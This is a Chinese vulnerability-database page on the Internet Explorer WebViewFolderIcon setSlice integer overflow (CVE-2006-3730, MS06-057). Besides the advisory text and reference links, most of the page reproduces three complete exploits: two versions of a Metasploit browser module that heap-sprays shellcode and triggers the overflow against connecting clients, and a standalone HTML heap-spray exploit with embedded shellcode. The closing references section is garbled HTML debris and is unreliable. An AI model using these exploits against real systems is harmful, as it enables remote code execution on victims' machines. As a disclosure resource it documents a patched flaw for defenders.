CVE-2006-3730
CVSS9.3
发布时间 :2006-07-21 10:03:00
修订时间 :2017-07-19 21:32:32
NMCOEPS    

[原文]Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy.


[CNNVD]Microsoft IE WebViewFolderIcon远程整数溢出漏洞(MS06-057)(CNNVD-200607-346)

        Internet Explorer是微软发布的非常流行的WEB浏览器。
        Internet Explorer在处理畸形的ActiveX对象调用方式时存在整数溢出漏洞,远程攻击者可能利用此漏洞导致浏览器崩溃或执行任意指令。
        如果攻击者能够向WebViewFolderIcon控件的setSlice方法传送0x7fffffff参数的话,可能导致浏览器崩溃或执行任意指令。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0
cpe:/a:microsoft:ie:6.0:sp1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:339Windows Shell Remote Code Execution Vulnerability
oval:gov.nist.fdcc.patch:def:791MS06-057: Vulnerability in Windows Explorer Could Allow Remote Execution (923191)
oval:gov.nist.USGCB.patch:def:791MS06-057: Vulnerability in Windows Explorer Could Allow Remote Execution (923191)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3730
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3730
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-346
(官方数据源) CNNVD

- 其它链接及资源

http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
(UNKNOWN)  MISC  http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
http://isc.sans.org/diary.php?storyid=1742
(UNKNOWN)  MISC  http://isc.sans.org/diary.php?storyid=1742
http://milw0rm.com/exploits/2440
(UNKNOWN)  MILW0RM  2440
http://riosec.com/msie-setslice-vuln
(UNKNOWN)  MISC  http://riosec.com/msie-setslice-vuln
http://securitytracker.com/id?1016941
(UNKNOWN)  SECTRACK  1016941
http://www.kb.cert.org/vuls/id/753044
(UNKNOWN)  CERT-VN  VU#753044
http://www.microsoft.com/technet/security/Bulletin/MS06-057.mspx
(UNKNOWN)  MS  MS06-057
http://www.securityfocus.com/archive/1/archive/1/447174/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060927 Exploit module available for WebViewFolderIcon setSlice 0-day
http://www.securityfocus.com/archive/1/archive/1/447383/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060929 Determina zero-day fix for CVE-2006-3730 (WebViewFolderIcon setSlice Integer Overflow)
http://www.securityfocus.com/archive/1/archive/1/447426/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060930 setSlice exploited in the wild - massively
http://www.securityfocus.com/archive/1/archive/1/447490/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060930 ZERT patch for setSlice()
http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded
(UNKNOWN)  HP  HPSBST02161
http://www.securityfocus.com/bid/19030
(UNKNOWN)  BID  19030
http://www.us-cert.gov/cas/techalerts/TA06-270A.html
(UNKNOWN)  CERT  TA06-270A
http://www.us-cert.gov/cas/techalerts/TA06-283A.html
(UNKNOWN)  CERT  TA06-283A
http://www.vupen.com/english/advisories/2006/2882
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2882
https://exchange.xforce.ibmcloud.com/vulnerabilities/27804
(UNKNOWN)  XF  ie-webviewfoldericon-dos(27804)

- 漏洞信息

Microsoft IE WebViewFolderIcon远程整数溢出漏洞(MS06-057)
高危 代码注入
2006-07-21 00:00:00 2009-09-10 00:00:00
远程  
        Internet Explorer是微软发布的非常流行的WEB浏览器。
        Internet Explorer在处理畸形的ActiveX对象调用方式时存在整数溢出漏洞,远程攻击者可能利用此漏洞导致浏览器崩溃或执行任意指令。
        如果攻击者能够向WebViewFolderIcon控件的setSlice方法传送0x7fffffff参数的话,可能导致浏览器崩溃或执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/bulletin/ms06-057.mspx?pf=true

- 漏洞信息 (2440)

MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (EDBID:2440)
windows remote
2006-09-27 Verified
0 H D Moore
N/A [点击下载]
# This module is part of the metasploit framework3 
# svn co http://metasploit.com/svn/framework3/trunk/

require 'msf/core'

module Msf

class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::Html

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision: 3783 $',
			'References'     => 
				[
					[ 'OSVDB', '27110' ],
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end
	
	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
		var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
		var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
		var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
		var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
		var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
		var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = Rex::Text.rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}
	
	
   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
	}
	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		# Randomize the whitespace in the document
		content.gsub!(/\s+/) do |s|
			len = rand(100)+2
			set = "\x09\x20\x0d\x0a"
			buf = ''
			
			while (buf.length < len)
				buf << set[rand(set.length)].chr
			end
			
			buf
		end
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response(cli, content)
	end

end

end

# milw0rm.com [2006-09-27]
		

- 漏洞信息 (2448)

MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html) (EDBID:2448)
windows remote
2006-09-28 Verified
0 jamikazu
N/A [点击下载]
<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu 
Mail: jamikazu@gmail.com

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful 

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

	var heapSprayToAddress = 0x05050505;
	var payLoadCode = unescape(
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");
	var heapBlockSize = 0x400000;
	var payLoadSize = payLoadCode.length * 2;
	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
	var spraySlide = unescape("%u0505%u0505");
	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
	memory = new Array();

	for (i=0;i<heapBlocks;i++)
	{
		memory[i] = spraySlide + payLoadCode;
	}

   	for ( i = 0 ; i < 128 ; i++) 
	{
		try{ 
			var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
			tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); 
		}catch(e){}
	}

	function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return spraySlide;
	}

</SCRIPT> 

</BODY>
</HTML>

# milw0rm.com [2006-09-28]
		

- 漏洞信息 (16564)

Internet Explorer WebViewFolderIcon setSlice() Overflow (EDBID:16564)
windows remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
				],
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2006-3730'],
					[ 'OSVDB', '27110' ],
					[ 'MSB', 'MS06-057'],
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 17 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)

		# Annoying AVs
		var_aname     = "==QMu42bjlkclRGbvZ0dllmViV2Vu42bjlkclRGbvZ0dllmViV2V".reverse.unpack("m*")[0]
		var_ameth     = "=U2Ypx2U0V2c".reverse.unpack("m*")[0]

		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)


		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {

	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;

	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] =
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}


	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( '#{var_aname}' );
		try { #{var_tic}.#{var_ameth}( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( '#{var_aname}' );
	}

	} catch( e ) { window.location = 'about:blank' ; }

	</script>
</head>
<body>
#{html}
</body>
</html>
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83190)

Internet Explorer WebViewFolderIcon setSlice() Overflow (PacketStormID:F83190)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,activex
windows,2k,xp
CVE-2006-3730
[点击下载]

This Metasploit module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
			'Description'    => %q{
				This module exploits a flaw in the WebViewFolderIcon ActiveX control
			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
			during the Month of Browser Bugs project (MoBB #18).
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2006-3730'],
					[ 'OSVDB', '27110' ],
					[ 'MSB', 'MS06-057'], 
					[ 'BID', '19030' ],
					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}
	
	
   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
	}
	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息

27110
Microsoft IE WebViewFolderIcon setSlice Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Internet Explorer contains a flaw that may allow a remote denial of service. The issue is triggered when calling the 'setSlice' method of the WebViewFolderIcon.WebViewFolderIcon.1 ActiveX object with the first parameter set to 0x7fffffff. This causes an invalid memory copy and may result in arbitrary code execution and/or a loss of availability for the browser.

- 时间线

2006-07-17 Unknow
2006-07-17 2006-10-10

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

http://browserfun.blogsp90%" borddddddddddddddddddddddd90%" borddddddddddddddddddddd"http:orddddddddddddddddddddddd90%" borddddddddddddddddddddd"ritGequeic MicrosoURL:d90%" borddddddddddddddddddddddd90%" bordddddddddddddddddddddddddd"KNOWN)  SEimmVD http:/>
http:/ogsp90%" borddddddddddddddddddddddd90%" borddddddddddddddddddddd"http:orddddddddddddddddddddddd90%" borddddddddddddddddddddd"ritGequeic I Please sealoURL:d90%" borddddddddddddddddddddddd90%" bordddddddddddddddddddddddddd"KNOWN)  SEiricon-setslice.html
/ie Advisory ID: /ie targ90%" borddddddddddddddddddddddd90%" borddddddddddddddddddddd"http:orddddddddddddddddddddddd90%" borddddddddddddddddddddd"ritNewstArticle:d90%" borddddddddddddddddddddddd90%" bordddddddddddddddddddddddddd"KNOWN)  SE6-05" tat="=true ret="_blank"193lic27cnnvd.org.cn/vulnerability/sho" tat="=true ret="_blank"193lic27ctarg90%" borddddddddddddddddddddddd90%" borddddddddddddddddddddd"http:orddddddddddddddddddddddd90%" borddddddddddddddddddddd"ritKeye}" :d90%" borddddddddddddddddddddddd90%" bordddddddddddddddddddddddddd"KNOWN)  SE6-05googlet of ta>3e.q=as publinnvd.org.cn/vulneras publitarg90%" borddddddddddddddddddddddd90%" borddddddddddddddddddddd"http:orddddddddddddddddddddddd90%" borddddddddddddddddddddd"rit
aB #18

- 漏洞信息

aB #18<